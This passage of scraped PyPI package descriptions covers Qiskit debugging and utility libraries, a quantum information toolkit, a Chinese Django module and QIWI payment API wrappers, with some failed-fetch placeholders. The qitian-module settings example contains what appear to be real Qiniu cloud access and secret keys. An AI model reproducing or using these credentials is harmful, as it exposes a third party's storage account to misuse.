calldebugger.debug(circuit,optimization_level=2,backend=backend,initial_layout=list(range(4)))On calling the debug method, a new jupyter widget is displayed providing a complete summary and details of the transpilation process for circuits of < 2000 depthWith an easy to use and responsive interface, users can quickly see which transpiler passes ran when, how they changed the quantum circuit and what exactly changed.Feature Highlightsjupyterview1. 
Circuit EvolutionSee your circuit changing while going through the transpilation process for a target quantum processor.A new custom feature enablingvisual diffsfor quantum circuits, allows you to see what exactly changed in your circuit using the matplotlib drawer of the qiskit module.ExampleCircuit 1Circuit 22. Circuit statisticsAllows users to quickly scan through how the major properties of a circuit transform during each transpilation pass.Helps to quickly isolate the passes which were responsible for the major changes in the resultant circuit.3. Transpiler Logs and Property setsEasily parse actions of the transpiler with logs emitted by each of its constituent passes and changes to the property set during transpilationEvery log record is color coded according to the level of severity i.e.DEBUG,INFO,WARNINGandCRITICAL.cliview1. Transpilation Summary and StatisticsA quick summary of the transpilation process for a given circuit.Faster access to information in the CLI view.2. Keyboard ShortcutsThe CLI view provides keyboard shortcuts for easy navigation and access to transpiler information.Aninteractive status barat the bottom of the screen provides information about the current state of the debugger.3. Transpiler Logs and Property setsEmits transpiler logs associated with each of the transpiler passes.Highlights addition to property set and its changes during the transpilation process.Demonstration and BlogHere is ademonstration of TreBuggeras a part of the final showcase for the Qiskit Advocate Mentorship Program, Fall 2021.You can also read about some more details of our project in theQiskit medium blogContributorsAboulkhair FodaHarshit Gupta"} +{"package": "qiskit-utils", "pacakge-description": "qiskit-utilsqiskit-utils is a library containing utility, quality of life methods for qiskit.current methodsparsing resultsparsing countsinserting instructions and gates into circuit (in any location not just append the gate to the circuit)Inserting instructionsfromqiskit_utilsimportinsert_instructioninstruction=Measure()insert_instruction(circuit,instruction,(circuit.qubits[0],),(circuit.clbits[1],),index)QuantumCircuitEnhancedfromqiskit.circuit.libraryimportiSwapGatefromqiskit_utilsimportQuantumCircuitEnhancedqc=QuantumCircuitEnhanced(2)qc.insert(iSwapGate(),(0,1),(,),index)Result parsingparse_result method allows to find the counts for each specific qubit individually\n(and allows for easy access to check counts for that one specific qubit, independent of the other qubit states)qc=QuantumCircuit(1,1)qc.x(0)qc.measure(0,0)backend=Aer.get_backend(\"aer_simulator\")transpiled_circuit=transpile(qc,backend)result=backend.run(transpiled_circuit).result()parsed_counts=parse_result(result,qc)# parsed_counts = {0: {'0': 0, '1': 1024}}2 return types are possible, with using the flag indexed_results=True resulting directory keys (the most upper level)\nwill be indexes of qubits (indexes will be same as in qc.qubits), with the flag set to false qubits will be returned\nindexed by the qubit object itself (can be received either from qc.qubits[i] or QuantumRegister()[i])Result parsing with countsqc=QuantumCircuit(2)creg1=ClassicalRegister(1)creg2=ClassicalRegister(1)qc.add_register(creg1)qc.add_register(creg2)qc.x(0)qc.measure(0,creg1[0])qc.measure(1,creg2[0])backend=Aer.get_backend(\"aer_simulator\")transpiled_circuit=transpile(qc,backend)result=backend.run(transpiled_circuit).result()parsed_counts=parse_counts(result,qc)# parsed_counts = {\"10\": 1024} while the get_counts from qiskit would return 
{\"0 1\": 1024}Note, qubits that had no measurements found for them are marked as - in the bitstringMore examplesexamples of usage can be found in a testing libraryqiskit-check"} +{"package": "qiskit-xyz2pdb", "pacakge-description": "qiskit-xyz2pdbThis program is designed primarily to convert XYZ files from the results ofQiskit's protein folding algorithm, but may also work with other similar XYZ files for protein coordinates. There are two options for the output: 1) a hetero atom (HETATM) format with connect records (CONECT), and 2) a conventional alpha carbon trace protein pdb format. In both outputs, each set of coordinates corresponds to the alpha carbon of each residue in the sequence.InstallTheqiskit-xyz2pdbpackage is available on the Python Package Index and Conda and can be installed with the following command line:# Install the package through PyPI\n$ pip install qiskit-xyz2pdb\n\n# Install the package through the Conda package manage\n$ conda install qiskit-xyz2pdbFeaturesThe hetero atom format is most useful for quick visualization, using a program such as NGL viewer. Note: this option assumes that the XYZ coordinates are all consecutively bound forming a continous single chain; it assumes that there are no side chains, and the CONECT records reflect this. How to run with this option:$ qiskit-xyz2pdb --in-xyz inputfile.xyz --out-pdb outputfile.pdb --hetero-atomsThe conventional alpha carbon trace format is more versatile and can be used for further research beyond visualization - such as reconstructing the full backbone and sidechains, adding a force field, and then performing molecular dynamics simulations. How to run with this option:$ qiskit-xyz2pdb --in-xyz inputfile.xyz --out-pdb outputfile.pdb --alpha-c-traces"} +{"package": "qiso", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qisquick", "pacakge-description": "QISquickHelper library for automating experimental setup, configuration, and data generation of Qiskit transpiler functionality.qisquick provides a test set of defined quantum circuits, functions to help modify transpiler configuration and passmanagers, and a database system for saving experimental data including backend state, transpilation statistics, and execution statistics.Using qisquickqisquick can be thought of as composed of two use-cases: experiment scripting and experiment execution. A quick use guide is provided here,\nbut more information can be found in the documentation.pdf file of this package, which includes documentation on individual modules,\nclasses, and functions.Experiment ScriptingResearchers must provide an experiment defined as a Callable that takes no arguments and returns circuit ids. A minimal example:def my_experiment():\n # Creates TestCircuit object and automatically generates a Premades circuit of type 'two_bell'\n circ = TestCircuit.generate(case='two_bell', size=4) \n\n return [circ.id]qisquick is in particular designed to ease experimenting with various transpiler configurations, and so many tools are provided to make scripting such experiments easier. A more comprehensive coverage of the purpose of the various classes can be found in the actual system documentation by calling help() on any function, but a few examples are provided here.The Premades class provides ~10 circuits designed to demonstrate various constraint topologies, be representative subcircuits, interesting primitives, or full algorithm implementations. 
All circuits can be generated using the same common interface, by providing a size (circuit width), and a truth value: a base state that should be encoded into oracles and used if the circuit requires a 'correct answer' (e.g. Grover's search).The TranspilerTools class provides helper methods to take qiskit-defined pre-populated PassManagers and exchange SWAP or layout passes with those defined by the researcher.The TestCircuit class allows researchers to easily generate statistics about TestCircuits, including transpile time, SWAPS inserted by transpiler routines, ideal distributions, and actual execution statistics.An experiment showing these behaviors:from qisquick.run_experiment import *\nfrom qisquick.circuits import Premades, TestCircuit\nfrom qisquick.transpilertools import get_transpiler_config, get_basic_pm, get_modified_pm\n\ndef my_experiment() -> list:\n # Make one of each kind of Premade and attach each to a TestCircuit\n size = 4\n tv = 3\n circs = create_all(size=size, truth_value=tv)\n\n # We could also generate the circs with a seed so they are reliably recreated\n # and also pass a filename to create image output of the circuits\n # circs = create_all(size=4, truth_value=3, seed = 404, filename='prepend_to_circs')\n\n # We could also add a specific type of circuit, defined in Premades.circ_lib\n new_test_circ = TestCircuit.generate(case='two_bell', size=size, truth_value=tv)\n circs.append(new_test_circ)\n\n # Or we can make an empty TestCircuit and add our own custom circ (or an existing Premades)\n tc = TestCircuit()\n custom_circ = Premades(size=size, truth_value=tv)\n custom_circ.h(0)\n custom_circ.cx(0, 1)\n custom_circ.measure(custom_circ.qr, custom_circ.cr)\n\n # You have to tell the TestCircuit what the size and tv params of the Premades is; should be fixed in the future\n tc.add_circ(custom_circ, size=size, truth_value=tv)\n circs.append(tc)\n\n # Now let's save a transpiler configuration for each circuit. \n provider = IBMQ.load_account()\n backend = provider.get_backend('MY PREFERRED BACKEND')\n\n # We must have a backend to target. This can be provided now, or at time of experiment execution.\n # Note that get_transpiler_config actually writes to each TestCircuit's transpiler_config param.\n # the configs returned are just for convenience if desired.\n configs = transpilertools.get_transpiler_config(circs)\n\n # Assume we have a new Passmanager SWAP pass we'd like to test out. 
This is provided by the researcher.\n my_swap = get_my_pass()\n\n # We generate a basic, optimization_level 3 PassManager for each of our TestCircuits, then exchange in our new pass\n pms = []\n for circ in circs:\n pm = get_basic_pm(circ.transpiler_config, level=3)\n modified_pm = transpilertools.get_modified_pm(pass_manager=pm, version=3, pass_type='swap', new_pass=my_swap)\n pms.append(modified_pm)\n\n # We can also execute experiments on our new pass\n # This tests transpilation time (average over attempts trials), generates compiled circs using the pm and stores\n # the compiled_circs attribute, and submits the job for execution on the backend chosen at runtime.\n TestCircuit.run_all_tests(circs, pms, attempts=5)\n\n # We return these ids of our Testcircuits\n return [circ.id for circ in circs]Experiment ExecutionOnce the researcher has an experiment they'd like to run, this can be handled very easily through one of two interfaces:For researchers who may want to modify actual qisquick functionality, or just prefer it, the experimental code can be inserted into therun_local_experiment()method ofrun_experiment.py. This module can then be called via normal CLI calls and will execute that experiment. Additionally, researchers can pass 3 flags (documentation also available by calling run_experiment.py -h):-v (-vv, -vvv): Increase the verbosity level of the logging system.-C, --Check_only: Checks only for previously run experimental results from IBM. Executes no experiment script.-R, --run_only: Runs experiment, but does not check for results from IBM. Runs local tests and, if called, send circuits for execution but quits immediately thereafter.Alternatively, in any module the researcher canfrom qisquick.run_experiment import run_experimentand can call this function to execute their experiment script. This function also accepts arguments equivalent to the previously mentioned flags and additionally allows the researcher to define their default backend, database location, etc ...Since the functions we used as examples when writing our script are built to use whatever default backend is called with run_experiment(), then this means that a researchercandefine a backend inside their script, but if they don't do so, then they can do it on calling the experiment and have their new default replicated automatically throughout their script.Instead of the CLI flags, this function accepts named params with the following keys: verbosity (int, range(4)), check_only (bool), run_only (bool).my_module.py\n from qisquick.run_experiment import run_experiment\n\n # verbosity = '-vv' (no flag is verbosity level 1)\n run_experiment(my_experiment, provider=my_provider, backend=my_backend, verbosity=3)If no backend and provider are provided, the library defaults are the public ibm-q provider and the public melbourne backend. Researchers can also pass a custom dblocation -- to create the db or reference an existing sqlite3 db of the correct structure. If no dblocation is provided, one is created at data/circuit_data.sqliteTips and TricksImport and use thePREFERRED_BACKENDglobal and theget_batchesfunction fromrun_experiment. PREFERRED_BACKEND\nhas a default set and can be changed by passing the preferred provider and preferred backend parameters torun_experiment. This way, changing one parameter can replicate backend changes throughout your entire experiment.'get_batches' is a utility function to to automate sending jobs to the IBM backends in polite chunk sizes.Best practice is to avoid making your own db. 
The library will automatically create one in your CWD/Data with the\nappropriate tables and fields."} +{"package": "qist", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qit", "pacakge-description": "IntroductionQuantum Information Toolkit (QIT) is a free, open source Python 3 package for various quantum\ninformation and computing -related purposes, released under GNU GPL v3. It is a descendant of the\nMATLAB Quantum Information Toolkit, and has considerably more functionality.The latest version can be found onour website.The toolkit is installed from the Python Package Index by$pipinstallqitor by cloning the Git repository, and installing directly from there:$gitclonehttps://git.code.sf.net/p/qit/code-pythonqit$cdqit$pipinstall.For interactive use, we recommend theIPython shell.To get an overview of the features and capabilities of the toolkit, run$pythonqit/examples.pyLicenseQIT is released under the GNU General Public License version 3.\nThis basically means that you can freely use, share and modify it as\nyou wish, as long as you give proper credit to the authors and do not\nchange the terms of the license. See LICENSE.txt for the details.Design notesThe main design goals for this toolkit are ease of use and comprehensiveness. It is primarily meant\nto be used as a tool for experimentation, hypothesis testing, small simulations, and learning, not\nfor computationally demanding simulations. Hence the efficiency of the algorithms used is not a\nnumber one priority.\nHowever, if you think an algorithm could be improved without compromising accuracy or\nmaintainability, please let the authors know or become a contributor yourself!ContributingQIT is an open source project and your contributions are welcome.\nTo keep the code readable and maintainable, we ask you to follow these\ncoding guidelines:Fully document all the modules, classes and functions using docstrings\n(purpose, calling syntax, output, approximations used, assumptions made\u2026).\nThe docstrings may contain reStructuredText markup for math, citations etc.\nUse the Google docstring style.Add relevant literature references todocs/refs.biband cite them in the function\nor module docstring usingsphinxcontrib-bibtexsyntax.Instead of using multiple similar functions, use a single function\nperforming multiple related tasks, see e.g.qit.state.State.measure.Raise an exception on invalid input.Use variables sparingly, give them descriptive (but short) names.Use brief comments to explain the logic of your code.When you add new functions also add tests for validating\nyour code. If you modify existing code, make sure you didn\u2019t break\nanything by checking that the tests still run successfully."} +{"package": "qitensor", "pacakge-description": "This module is essentially a wrapper for numpy that uses semantics useful for\nfinite dimensional quantum mechanics of many particles. In particular, this\nshould be useful for the study of quantum information and quantum computing.\nEach array is associated with a tensor-product Hilbert space. The underlying\nspaces can be bra spaces or ket spaces and are indexed using any finite\nsequence (typically a range of integers starting from zero, but any sequence is\nallowed). 
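For example, component spaces and an array over their tensor product can be put together along these lines (a minimal sketch: the qubit constructor and the * product are the ones described below, while the array() factory is an assumption about the API):\nfrom qitensor import qubit\nha = qubit('a')  # ket space for particle a\nhb = qubit('b')  # ket space for particle b\npsi = (ha * hb).array()  # an array living in the composite ket space |a,b>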
When arrays are multiplied, a tensor contraction is performed among\nthe bra spaces of the left array and the ket spaces of the right array.\nVarious linear algebra methods are available which are aware of the Hilbert\nspace tensor product structure.Component Hilbert spaces have string labels (e.g.qubit('a')*qubit('b')gives|a,b>).Component spaces are finite dimensional and are indexed either by integers or\nby any sequence (e.g. elements of a group).In Sage, it is possible to create arrays over the Symbolic Ring.Multiplication of arrays automatically contracts over the intersection of the\nbra space of the left factor and the ket space of the right factor.Linear algebra routines such as SVD are provided which are aware of the\nHilbert space labels."} +{"package": "qitian-django-starting", "pacakge-description": "No description available on PyPI."} +{"package": "qitian-module", "pacakge-description": "\u8d77\u7530\uff08\u82cf\u5dde\uff09\u8425\u9500\u7b56\u5212\u6709\u9650\u516c\u53f8DJANGO\u9879\u76ee\u5171\u7528\u6a21\u5757\u7cfb\u7edfRelease Summery1.7.9\u6dfb\u52a0urls_prod, \u9879\u76ee\u5f15\u7528\u65f6\uff0c\u76f4\u63a5\u5305\u542b\u6b64url\u8def\u7531\u6dfb\u52a0qitian-simditor\u5728\u9879\u76ee\u4f9d\u8d56\u5217\u8868\u914d\u7f6e\u6587\u4ef6settings\u6b64\u9879\u76ee\u5305\u542b\u57fa\u7840\u9879\u76ee\u914d\u7f6e\uff0c\u4e00\u822c\u9879\u76ee\u53ef\u4ee5\u76f4\u63a5\u590d\u5236settings\u914d\u7f6e\u4e3a\u57fa\u7840\u914d\u7f6e\u3002\u6b64\u914d\u7f6e\u4f1a\u6839\u636e\u65b0\u52a0\u5165\u7684\u6a21\u5757\u6765\u4fee\u6539\uff0c\u5df2\u6709\u9879\u76ee\u4e0d\u8981\u76f4\u63a5\u62f7\u8d1d\u3002\u9879\u76ee\u4f9d\u8d56\u6587\u4ef6\u6b64\u9879\u76ee\u7684\u4f9d\u8d56\u6587\u4ef6\u8981\u91c7\u7528\u624b\u52a8\u6dfb\u52a0\u7684\u65b9\u6cd5\uff0c\u907f\u514d\u4f7f\u7528freeze\u65b9\u5f0f\u3002\u76ee\u7684\u662f\u4e3a\u4e86\u8ba9\u4f9d\u8d56\u9879\u76ee\u7b80\u6d01\u6613\u8bfb\u3002\u7ba1\u7406\u754c\u9762\u7ba1\u7406\u754c\u9762\u4f7f\u7528grappelli,\u7ba1\u7406\u9996\u9875\u4f7f\u7528grappelli-dashboard\u9879\u76ee\u914d\u7f6e\u4fe1\u606fAPP\u5217\u8868INSTALLED_APPS = [\n 'grappelli.dashboard',\n 'grappelli',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'django_celery_beat',\n 'django_celery_results',\n 'smart_selects',\n 'easy_thumbnails',\n 'system',\n 'simditor',\n 'autopost',\n 'usercenter',\n 'taggit',\n 'taggit_labels',\n 'taggit_helpers',\n]\u5728middleware\u4e2d\u6dfb\u52a0'system.middleware.site.CurrentSiteMiddleware',template.options\u6dfb\u52a0'system.context_processors.site_info',\u9759\u6001\u6587\u4ef6\u7b49\u914d\u7f6eLANGUAGE_CODE = 'zh-hans'\n\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nLANGUAGES = (\n ('en', ('English',)),\n ('zh-hans', ('\u4e2d\u6587\u7b80\u4f53',)),\n)\n\n# \u7ffb\u8bd1\u6587\u4ef6\u6240\u5728\u76ee\u5f55\uff0c\u9700\u8981\u624b\u5de5\u521b\u5efa\nLOCALE_PATHS = (\n os.path.join(BASE_DIR, 'locale'),\n)\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.1/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"static\"),\n 'static/',\n]\n\nSTATIC_ROOT = 'pub_static/'\nSTATICFILES_FINDERS = (\n \"django.contrib.staticfiles.finders.FileSystemFinder\",\n \"django.contrib.staticfiles.finders.AppDirectoriesFinder\"\n)\n# 
\u9759\u6001\u6587\u4ef6\u7248\u672c\uff0c\u53d1\u5e03\u540e\uff0c\u6709js,css\u6587\u4ef6\u53d8\u52a8\u9700\u66f4\u6362\nSTATIC_VERSION = 0.1\n# \u9879\u76ee\u652f\u4ed8\u8bbe\u7f6e\nAES_KEY = env.str('AES_KEY')\nPAY_PROJECT_ID = env.int('PAY_PROJECT_ID')\nPAY_URL = 'https://pay.qitian.biz/pay/index/%d/' % PAY_PROJECT_ID\n# SMS\u6a21\u677f, \u4e0d\u540c\u9879\u76ee\u9700\u8981\u4fee\u6539\nSMS_TEMPLATE = {\n 'register': '\u3010\u5a31\u4e50\u4fe1\u606f\u7f51\u3011\u4eb2\u7231\u7684{name}\u8d35\u5bbe\uff0c\u60a8\u7684\u9a8c\u8bc1\u7801\u662f{code}\u3002\u6709\u6548\u671f\u4e3a{time}\u5206\u949f\uff0c\u8bf7\u5c3d\u5feb\u9a8c\u8bc1',\n 'notice': '\u3010\u5a31\u4e50\u4fe1\u606f\u7f51\u3011\u4e3b\u4eba\uff0c\u5ba2\u6237\uff1a{name}\u5df2\u652f\u4ed8\u8ba2\u5355:{order}\uff0c\u8bf7\u60a8\u53ca\u65f6\u5904\u7406\uff01',\n 'reg_tel_admin': '\u3010\u5a31\u4e50\u4fe1\u606f\u7f51\u3011\u6709\u624b\u673a\u53f7\uff1a{tel} \u7528\u6237\u4e8e{time}\u6ce8\u518c\u4e86{site}, \u8bf7\u5c3d\u5feb\u8054\u7cfb\u3002',\n}\nSMS_TIMES = 3\n\n# \u8bbe\u7f6e\u7528\u6237\u5c5e\u6027\nAUTH_PROFILE_MODULE = 'usercenter.QtUser'\n\n# \u63a5\u53e3\u5b9a\u4e49\nREST_FRAMEWORK = {\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'PAGE_SIZE': 20,\n 'page_query_param': 'page',\n}\n\nSHOW_TJ = env.bool('SHOW_TJ')\n\nSITE_NAME = env.str('SITE_NAME')\n\nGRAPPELLI_INDEX_DASHBOARD = 'dashboard.CustomIndexDashboard'\u7f13\u5b58\u4e0elog\u8bbe\u7f6e# \u8bbe\u7f6e\u7f13\u5b58\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django_redis.cache.RedisCache\",\n \"LOCATION\": \"redis://127.0.0.1:6379/1\",\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"django_redis.client.DefaultClient\",\n # \"PASSWORD\": \"mysecret\"\n }\n }\n}\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'verbose': {\n 'format': ('%(asctime)s [%(process)d] [%(levelname)s] ' +\n 'pathname=%(pathname)s lineno=%(lineno)s ' +\n 'funcname=%(funcName)s %(message)s'),\n 'datefmt': '%Y-%m-%d %H:%M:%S',\n },\n 'simple': {\n 'format': '%(asctime)s [%(levelname)s] %(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S',\n },\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple',\n },\n 'console-verbose': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose',\n },\n 'log_file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'filename': os.path.join(BASE_DIR, 'django.log'),\n 'maxBytes': 33554432,\n 'formatter': 'verbose',\n },\n 'celery': {\n # 'level': 'INFO',\n # 'class': 'logging.handlers.RotatingFileHandler',\n 'level': 'DEBUG',\n 'formatter': 'simple',\n 'class': 'logging.handlers.TimedRotatingFileHandler',\n 'filename': 'celery.log',\n 'when': 'midnight'\n },\n\n },\n 'loggers': {\n 'django': {\n 'handlers': ['console', 'log_file'],\n 'propagate': True,\n 'level': 'INFO',\n },\n 'qt_celery': {\n 'handlers': ['celery'],\n 'level': 'INFO',\n 'propagate': True,\n },\n },\n}#\u4e03\u725b\u914d\u7f6e# \u4e03\u725b\u914d\u7f6e\nQINIU_ACCESS_KEY = 'r35LYq6an6L0FUAmDUhqDNXICbtZ5JI1vKWXBGKv'\nQINIU_SECRET_KEY = '8GkmiCK4_RjGWLKcJtjIl_8RH9QdnvSI_ulo7Apu'\nQINIU_URL = 'https://media.qitian.biz/'\nQINIU_BUCKET = 'qitian'\nQINIU_FOLDER = 'autopost'SIMDITOR\u914d\u7f6e#SIMDITOR\u914d\u7f6e\nSIMDITOR_UPLOAD_PATH = 'uploads/'\nSIMDITOR_IMAGE_BACKEND = 'pillow'\n\nSIMDITOR_TOOLBAR = [\n 'title', 'bold', 'italic', 'underline', 'strikethrough', 'fontScale',\n 'color', '|', 'ol', 'ul', 'blockquote', 'code', 'table', '|', 
'link',\n 'image', 'hr', '|', 'indent', 'outdent', 'alignment', 'fullscreen',\n 'markdown', 'emoji'\n]\n\nSIMDITOR_CONFIGS = {\n 'toolbar': SIMDITOR_TOOLBAR,\n 'upload': {\n 'url': '/simditor/upload/',\n 'fileKey': 'upload',\n 'image_size': 1024 * 1024 * 4 # max image size 4MB\n },\n 'emoji': {\n 'imagePath': '/static/simditor/images/emoji/'\n }\n}urls.py\u4e2d\u6dfb\u52a0re_path(r'^simditor/', include('simditor.urls')),\u66f4\u65b0\u6b65\u9aa4autopost\u6a21\u5757\u9700\u8981\u5220\u9664:articlecategoryauthor\u4e00\u5b9a\u8981\u5148\u6dfb\u52a0\u4f5c\u8005\u90e8\u7f72\u6dfb\u52a0\u524d\u6bb5\u652f\u6301npm install -g vue-cli"} +{"package": "qitian-simditor", "pacakge-description": "pip install django-SimditorAddsimditorto yourINSTALLED_APPSsetting."} +{"package": "qito", "pacakge-description": "\u57fa\u4e8ePython,\u89c6\u9891\u3001\u97f3\u4e50\u3001\u76f4\u64ad\u4e0b\u8f7d\u5668,\u652f\u6301YouKu\u3001QQ\u3001Iqiyi\u7b49"} +{"package": "qiubai", "pacakge-description": "UNKNOWN"} +{"package": "qiu_nester", "pacakge-description": "UNKNOWN"} +{"package": "qiushi_mp4_download", "pacakge-description": "UNKNOWN"} +{"package": "qiutil", "pacakge-description": "qiutil provides helper functions for the ohsu-qin projects. See thedocumentationfor more information."} +{"package": "qiu-utils", "pacakge-description": "No description available on PyPI."} +{"package": "qiuwenbot", "pacakge-description": "Qiuwen Baike bot / \u6c42\u95fb\u767e\u79d1\u673a\u5668\u4ebaQiuwen Baikebot. /\u6c42\u95fb\u767e\u79d1\u673a\u5668\u4eba\u3002Features / \u529f\u80fdComprehensive Cleanup / \u7efc\u5408\u6cbb\u7406Cleaning up illegal references / \u6e05\u7406\u975e\u6cd5\u53c2\u8003\u6587\u732eCleaning up unsupported HTML tags / \u6e05\u7406\u4e0d\u652f\u6301\u7684HTML\u6807\u7b7eCleaning up expired templates / \u6e05\u7406\u8fc7\u671f\u6a21\u677fRemoving illegal flags of the Taiwan authorities / \u6e05\u7406\u53f0\u6e7e\u5f53\u5c40\u975e\u6cd5\u65d7\u5e1cRemoving illegal era names of the Taiwan authorities / \u6e05\u7406\u53f0\u6e7e\u5f53\u5c40\u975e\u6cd5\u5e74\u53f7Correcting terms related to Taiwan / \u4fee\u6b63\u6d89\u53f0\u7528\u8bedCorrecting terms related to Hong Kong / \u4fee\u6b63\u6d89\u6e2f\u7528\u8bedCorrecting terms related to politics / \u4fee\u6b63\u6d89\u653f\u7528\u8bedCorrecting terms related to \"Cultural Revolution\" / \u4fee\u6b63\u201c\u6587\u9769\u201d\u7528\u8bedMarking redundant entries caused by differences between Simplified and Traditional Chinese / \u6807\u8bb0\u7b80\u7e41\u5dee\u5f02\u9020\u6210\u7684\u91cd\u590d\u6761\u76eeDisclaimer / \u514d\u8d23\u58f0\u660eQiuwen Baike\u00ae is a trademark or registered trademark of the operator of Qiuwen Baike website or its affiliated entities. This project uses the trademark legitimately based on Article 59 of the \"Trademark Law of the People's Republic of China\". When using it in the modified version of this project, one should observe the \"Trademark Law\". 
/ \u6c42\u95fb\u767e\u79d1\u00ae\u662f\u6c42\u95fb\u767e\u79d1\u7f51\u7ad9\u8fd0\u8425\u8005\u6216\u5176\u5173\u8054\u5b9e\u4f53\u7684\u5546\u6807\u6216\u6ce8\u518c\u5546\u6807\uff0c\u672c\u9879\u76ee\u57fa\u4e8e\u300a\u4e2d\u534e\u4eba\u6c11\u5171\u548c\u56fd\u5546\u6807\u6cd5\u300b\u7b2c\u4e94\u5341\u4e5d\u6761\u5bf9\u8be5\u5546\u6807\u6b63\u5f53\u4f7f\u7528\u3002\u5728\u672c\u9879\u76ee\u7684\u4fee\u6539\u7248\u672c\u4e2d\u4f7f\u7528\u65f6\uff0c\u5e94\u6ce8\u610f\u9075\u5b88\u300a\u5546\u6807\u6cd5\u300b\u3002"} +{"package": "qiuying", "pacakge-description": "Qiuying RPAA plain, simple and this-is-the-way library for RPA developing.Functionswebexcel"} +{"package": "qiuyuan", "pacakge-description": "No description available on PyPI."} +{"package": "qiwan", "pacakge-description": "UNKNOWN"} +{"package": "qiwi", "pacakge-description": "QIWI api"} +{"package": "qiwi-api", "pacakge-description": "qiwi_apiqiwi_api - \u043c\u043e\u0434\u0443\u043b\u044c \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 Qiwi API\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 Qiwi\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430$pipinstall--upgradeqiwi_api\u041f\u0440\u0438\u043c\u0435\u0440fromqiwi_apiimportQiwiapi=Qiwi('your_token_here')print(api.balance(only_balance=True))"} +{"package": "qiwiBillPaymentsAPI", "pacakge-description": "Universal payments API Python SDKPython SDK \u043c\u043e\u0434\u0443\u043b\u044c \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0435\u0434\u0438\u043d\u043e\u0433\u043e \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u044d\u043a\u0432\u0430\u0439\u0440\u0438\u043d\u0433\u0430 \u0438 QIWI \u041a\u043e\u0448\u0435\u043b\u044c\u043a\u0430.\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0438 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e pip:pip3installqiwiBillPaymentsAPI\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435:fromQiwiBillPaymentsAPIimportQiwiBillPaymentsAPI\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044fAPI P2P-\u0441\u0447\u0435\u0442\u043e\u0432 (\u0434\u043b\u044f \u0444\u0438\u0437\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043b\u0438\u0446):https://developer.qiwi.com/ru/p2p-paymentsAPI QIWI \u041a\u0430\u0441\u0441\u044b (\u0434\u043b\u044f \u044e\u0440\u0438\u0434\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043b\u0438\u0446):https://developer.qiwi.com/ru/bill-payments\u0410\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f\u0414\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f SDK \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044fPUBLIC_KEY\u0438SECRET_KEY, \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 
